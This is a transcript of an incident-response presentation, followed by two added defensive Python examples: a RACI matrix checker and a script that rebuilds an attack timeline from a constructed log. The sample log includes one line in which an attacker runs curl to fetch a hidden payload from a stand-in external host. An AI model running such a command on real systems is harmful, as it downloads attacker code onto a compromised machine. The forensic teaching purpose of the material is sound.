Build Your Own Incident Response
Presentation used at the (ISC)2 SecureMunich and SecureDusseldorf meetings.
    Presentation Transcript

    • BYO-IR: Build your own 'incident response'. Wim Remes - (ISC)2 - IOActive
    • (diagram) --------RISK--------- COMPANY
    • IF vs. WHEN
    • THE IR TIMELINE (reality). Wim Remes - wim.remes@ioactive.co.uk. Timeline points A B C D E F G, labelled: attack occurred; compromise detected; window of compromise. PANIC!!!
    • THE IR TIMELINE (for the pathological optimist). Timeline points A B C D E F G, labelled: attack occurred; compromise detected; window of compromise; response.
    • THE IR TIMELINE (how it should be). Timeline points A B C D E F G, labelled: attack occurred; compromise detected; window of compromise; response.
    • THE IR TIMELINE (for the pathological liar). Timeline points A B C D E F G, labelled: attack occurred; compromise detected; window of compromise; response.
    • WHO'S WHO? Executive Management; IT Management; IT Personnel
    • WHO'S WHO? Customers/Clients; Law Enforcement; Press/Media; "The Angry Mob" (Y U USE MD5?)
    • WHO'S WHO? IT Personnel; Customers/Clients
    • IR SHOPPING LIST: a. Awesome people! b. Management support (no kidding) c. IR process + RACI d. Supporting technology e. Training & test drives
    • AWESOME PEOPLE (Without me, you are just aweso)
    • AWESOME PEOPLE (you already have them)
    • MANAGEMENT SUPPORT
    • IR PROCESS: PREPARE > DETECT > ANALYZE > CONTAIN > RECOVER > POST MORTEM
    • IR RACI (matrix; the column headings did not survive extraction). Rows: External Communications; Initiate IR Process; Collect Evidence. Cells as extracted, row by row, left to right: C,I | A | R; C,I | R,A | C,I; R | C,I | A
    • TECHNOLOGY (because you don't go to war in a speedo ...)
    • TECHNOLOGY (it's pretty basic really ...): a. Segment your network!! b. Use PGP (and train your people to use it) c. Log everything you could possibly need d. Full network captures are helpful! e. How far can you take FOSS? f. Complement with commercial products. g. Train, train, train, train, train, train, ... (some demos)
    • TRAINING & TEST
    • "In a real war you don't fight soldiers with cleaning ladies, you fight with soldiers. In a cyberwar, you fight hackers with hackers." Thank you.
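The RACI slide (item c of the shopping list) gives the activities and the R/A/C/I letters but not how to check the matrix. The script below is an added example, not from the deck: it encodes an illustrative IR RACI (roles are the three internal groups from the "Who's who?" slide; the cell assignments are assumed, since the slide's column headings are not in the transcript) and validates the two rules any RACI must satisfy, exactly one Accountable per activity and at least one Responsible, then counts how much R/A load lands on each role.

```python
from collections import Counter

VALID_LETTERS = {"R", "A", "C", "I"}

# Illustrative IR RACI (assumed cell assignments, not the deck's matrix):
# activities from the RACI slide, roles from the "Who's who?" slide.
IR_RACI = {
    "Initiate IR Process": {
        "Executive Management": "C,I",
        "IT Management": "R,A",
        "IT Personnel": "C,I",
    },
    "Collect Evidence": {
        "Executive Management": "I",
        "IT Management": "A",
        "IT Personnel": "R",
    },
    "External Communications": {
        "Executive Management": "A",
        "IT Management": "R",
        "IT Personnel": "I",
    },
}


def parse_cell(cell):
    """'R,A' -> {'R', 'A'}; an empty cell or '-' means the role is not involved."""
    parts = [p.strip().upper() for p in cell.split(",")]
    letters = {p for p in parts if p and p != "-"}
    bad = letters - VALID_LETTERS
    if bad:
        raise ValueError(f"invalid RACI letter(s) {sorted(bad)} in cell {cell!r}")
    return letters


def check_raci(matrix):
    """Return a list of rule violations; an empty list means the matrix is sound.

    Rules: every activity has exactly one Accountable (A) and at least one
    Responsible (R). Without a single A nobody owns the call during an
    incident; without an R nobody actually does the work."""
    problems = []
    for activity, row in matrix.items():
        counts = Counter()
        for cell in row.values():
            for letter in parse_cell(cell):
                counts[letter] += 1
        if counts["A"] != 1:
            problems.append(f"{activity}: needs exactly one A, has {counts['A']}")
        if counts["R"] == 0:
            problems.append(f"{activity}: has no R")
    return problems


def role_load(matrix):
    """Number of activities each role is R or A for: a role carrying all of
    them is a single point of failure when that person is on holiday."""
    load = Counter()
    for row in matrix.values():
        for role, cell in row.items():
            if parse_cell(cell) & {"R", "A"}:
                load[role] += 1
    return dict(load)


if __name__ == "__main__":
    print(check_raci(IR_RACI) or "RACI OK")
    print(role_load(IR_RACI))
```

In the illustrative matrix IT Management is R or A for every activity, which the load count makes visible; that is the kind of concentration a test drive (item e) should exercise by having that role unavailable.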
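The four timeline slides turn on the gap between "attack occurred" and "compromise detected", and items c and d of the technology slide (log everything, keep full captures) are what let you measure that gap after the fact. The script below is an added example that is not from the deck: it reconstructs the slide's timeline from a constructed, merged log stream. It takes the first detection alert, pivots on the external address the alert names (the internal range 10.0.0.0/8, the host names, the IPs and the ticket number are all assumed), finds the earliest log line that mentions that address as the attack start, and reports time to detect, time to contain, the window of compromise and time to recover.

```python
import re
from datetime import datetime, timezone
from ipaddress import ip_address, ip_network

# Constructed sample log (not from the deck): one merged, UTC-stamped stream
# from a web host, an IDS and the IR ticketing system. Hosts, addresses and
# the ticket number are invented; the lines arrive out of order on purpose.
SAMPLE_LOG = """\
2013-02-12T09:40:10Z ids01 suricata: ALERT outbound beacon from 10.0.0.21 to 203.0.113.9
2013-02-01T03:12:44Z web01 sshd: Failed password for root from 203.0.113.9 port 51022 ssh2
2013-02-01T03:12:51Z web01 sshd: Accepted password for root from 203.0.113.9 port 51022 ssh2
2013-02-01T03:15:02Z web01 sudo: root : COMMAND=/usr/bin/curl -o /tmp/.x http://203.0.113.9/x
2013-02-12T11:05:00Z ir-team: ticket IR-0042 opened, web01 isolated from the network
2013-02-13T16:30:00Z ir-team: web01 rebuilt from a known-good image, credentials rotated
"""

INTERNAL_NET = ip_network("10.0.0.0/8")  # assumed: the organisation's own address space
IPV4_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def parse_log(text):
    """Parse 'ISO-8601Z message' lines into a time-sorted list of (datetime, message)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, msg = line.split(" ", 1)
        ts = datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append((ts, msg))
    events.sort(key=lambda e: e[0])  # sources are merged out of order, as in practice
    return events


def first_match(events, pattern):
    """First (datetime, message) whose message matches the regex, or None."""
    for ts, msg in events:
        if re.search(pattern, msg):
            return ts, msg
    return None


def build_timeline(events, detect=r"\bALERT\b", contain=r"\bisolated\b", recover=r"\brebuilt\b"):
    """Reconstruct the slide's timeline: attack occurred -> compromise detected
    -> contained -> recovered. The detection line supplies the pivot (the
    external address it names); the earliest log line naming that address is
    the best estimate of when the attack occurred, which precedes detection."""
    det = first_match(events, detect)
    if det is None:
        raise ValueError("no detection event: the window of compromise is still open")
    externals = [ip for ip in IPV4_RE.findall(det[1]) if ip_address(ip) not in INTERNAL_NET]
    if not externals:
        raise ValueError("detection event names no external address to pivot on")
    attacker = externals[0]
    pivot = re.compile(r"\b" + re.escape(attacker) + r"\b")
    attack = next(ts for ts, msg in events if pivot.search(msg))  # sorted, so the earliest
    con = first_match(events, contain)
    rec = first_match(events, recover)
    secs = lambda a, b: int((b - a).total_seconds())
    return {
        "attacker_ip": attacker,
        "attack_occurred": attack,
        "compromise_detected": det[0],
        "contained": con[0] if con else None,
        "recovered": rec[0] if rec else None,
        "time_to_detect_s": secs(attack, det[0]),
        "time_to_contain_s": secs(det[0], con[0]) if con else None,
        # the window of compromise runs from first attacker activity until containment
        "window_of_compromise_s": secs(attack, con[0]) if con else None,
        "time_to_recover_s": secs(con[0], rec[0]) if con and rec else None,
    }


if __name__ == "__main__":
    for key, value in build_timeline(parse_log(SAMPLE_LOG)).items():
        print(f"{key:24} {value}")
```

On the sample the attack start lands eleven days before the alert, which is the "reality" slide in numbers; it is only recoverable because the sshd failures from the first night were still in the logs. Drop the containment line and the window is reported as open (None) rather than guessed, and with no detection event at all the function refuses to produce a timeline.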